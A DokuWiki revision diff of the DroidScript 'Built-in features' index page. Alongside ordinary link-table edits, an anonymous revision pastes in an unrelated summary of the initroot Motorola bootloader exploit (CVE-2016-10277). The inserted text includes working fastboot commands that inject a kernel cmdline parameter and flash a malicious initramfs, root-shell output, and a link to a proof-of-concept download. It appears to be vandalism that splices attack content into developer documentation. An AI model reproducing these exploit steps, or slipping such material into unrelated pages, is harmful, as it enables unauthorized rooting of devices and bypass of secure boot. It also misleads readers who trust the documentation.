DroidScript Wiki

User Tools

Site Tools

Trace:
built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision 		Previous revision
Next revision Both sides next revision
built_in:start [2014/12/31 15:48]
stevegarman tidy up 		built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
Line 1: Line 1:
-=====Built-in features===== +Sources: 
 +https://alephsecurity.com/2017/08/30/untethered-initroot/ 
 +https://github.com/alephsecurity/initroot
  
 +initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
  
 +By Roee Hay / Aleph Research, HCL Technologies
 +
 +Recap of the Vulnerability and the Tethered-jailbreak
 +
 +1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
 +2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
 +3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
 +4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
 +5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
 +For example, here is a successful run of the exploit on cedric (Moto G5)
 +
 +$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598" 
 +$ fastboot flash aleph initroot-cedric.cpio.gz 
 +$ fastboot continue
 +
 +$ adb shell 
 +cedric:/ # id
 +uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
 +cedric:/ # getenforce
 +Permissive
 +cedric:/ #
 +
 +
 +Proof of Concept:
 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip
 +
 +            
 ====Links==== ====Links====
-[[app|app object]]\\ +^App and Layout^ 
-[[built_in:app_events|App Events]]\\ +[[app|app object]] | 
-[[built_in:layouts|Layouts]]+[[built_in:app_events|App Events]] | 
 +[[built_in:layouts|Layouts]]|
 ==== Controls ==== ==== Controls ====
-^Controls^ +^ Controls                                                   
-| [[built_in:audiorecorder|AudioRecorder control]] | +| [[built_in:audiorecorder|AudioRecorder control]]           
-| [[built_in:bluetoothlist|BluetoothList control]] | +| [[built_in:bluetoothlist|BluetoothList control]]           
-| [[built_in:bluetoothserial|BluetoothSerial control]] | +| [[built_in:bluetoothserial|BluetoothSerial control]]       
-| [[built_in:buttons|The Button control]] | +| [[built_in:buttons|Button control]]                        
-| [[built_in:cameraview|CameraView control]] | +| [[built_in:cameraview|CameraView control]]                 
-| [[built_in:checkboxes|CheckBoxes]] | +| [[built_in:checkboxes|CheckBoxes]]                         
-| [[built_in:crypt|Crypt control]] | +| [[built_in:crypt|Crypt control]]                           | 
-| [[built_in:dialog|Dialog control]] | +| [[built_in:database|Database control]]                     
-| [[built_in:downloader|Downloader]] | +| [[built_in:dialog|Dialog control]]                         
-| [[built_in:email|Email control]] | +| [[built_in:downloader|Downloader]]                         
-| [[built_in:images|Image control]] | +| [[built_in:email|Email control]]                           | 
-| [[built_in:ioio|IOIO control]] | +| [[built_in:create_file|File control]]                      | 
-| [[built_in:listdialog|ListDialog control]] | +| [[built_in:glview|GLView control]]                         
-| [[built_in:lists|List control]] | +| [[built_in:images|Image control]]                          
-| [[built_in:locator|Locator control]] | +| [[built_in:ioio|IOIO control]]                             
-| [[built_in:mediaplayer|MediaPlayer control]] | +| [[built_in:listdialog|ListDialog control]]                 
-| [[built_in:mediastore|MediaStore control]] | +| [[built_in:lists|List control]]                            | 
-| [[built_in:netclient|NetClient control]] | +| [[built_in:listview|ListView]]                             
-| [[built_in:notification|Notification control]] | +| [[built_in:locator|Locator control]]                       
-| [[built_in:nxt|NXT control]] | +| [[built_in:mediaplayer|MediaPlayer control]]               
-| [[built_in:nxtinfo|NxtInfo control]] | +| [[built_in:mediastore|MediaStore control]]                 
-| [[built_in:nxtremote|NxtRemote control]] | +| [[built_in:netclient|NetClient control]]                   
-| [[built_in:scroller|Scroller control]] | +| [[built_in:notification|Notification control]]             
-| [[built_in:seekbars|Seekbar control]] | +| [[built_in:nxt|NXT control]]                               
-| [[built_in:sensors|Sensor control]] | +| [[built_in:nxtinfo|NxtInfo control]]                       
-| [[built_in:service|Service control]] | +| [[built_in:nxtremote|NxtRemote control]]                   
-| [[built_in:smartwatch|SmartWatch control]] | +| [[built_in:scroller|Scroller control]]                     
-| [[built_in:sms|SMS control]] | +| [[built_in:seekbars|Seekbar control]]                      
-| [[built_in:speechrecognition|Speech Recognition control]] | +| [[built_in:sensors|Sensor control]]                        
-| [[built_in:spinner|Spinner control]] | +| [[built_in:service|Service control]]                       
-| [[built_in:synth|Synth control]] | +| [[built_in:smartwatch|SmartWatch control]]                 
-| [[built_in:tabs|Tabs control]] | +| [[built_in:sms|SMS control]]                               
-| [[built_in:text|Text control]] | +| [[built_in:speechrecognition|Speech Recognition control]]  
-| [[built_in:textedit|TextEdit control]] | +| [[built_in:spinner|Spinner control]]                       
-| [[built_in:togglebuttons|ToggleButton control]] +| [[built_in:synth|Synth control]]                           
-| [[built_in:usbserial|USBSerial control]] | +| [[built_in:tabs|Tabs control]]                             
-| [[built_in:videoview|VideoView control]] | +| [[built_in:text|Text control]]                             
-| [[built_in:webserver|WebServer control]] | +| [[built_in:textedit|TextEdit control]]                     
-| [[built_in:webview|WebView control]] | +| [[built_in:togglebuttons|ToggleButton control]]            | 
-| [[built_in:zip|ZipUtil control]] |+| [[built_in:usbserial|USBSerial control]]                   
 +| [[built_in:videoview|VideoView control]]                   
 +| [[built_in:webserver|WebServer control]]                   
 +| [[built_in:webview|WebView control]]                       | 
 +| [[built_in:yesnodialog|YesNoDialog]]                       
 +| [[built_in:zip|ZipUtil control]]                           | 
 ---- ----
 +
 +
 ====Note for contributors==== ====Note for contributors====
 If you wish to create a new page in the **Built-in features** namespace, please create a link to the new page above, save this page and click on the link you just created. If you wish to create a new page in the **Built-in features** namespace, please create a link to the new page above, save this page and click on the link you just created.
built_in/start.txt · Last modified: 2018/12/31 01:07 (external edit)

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki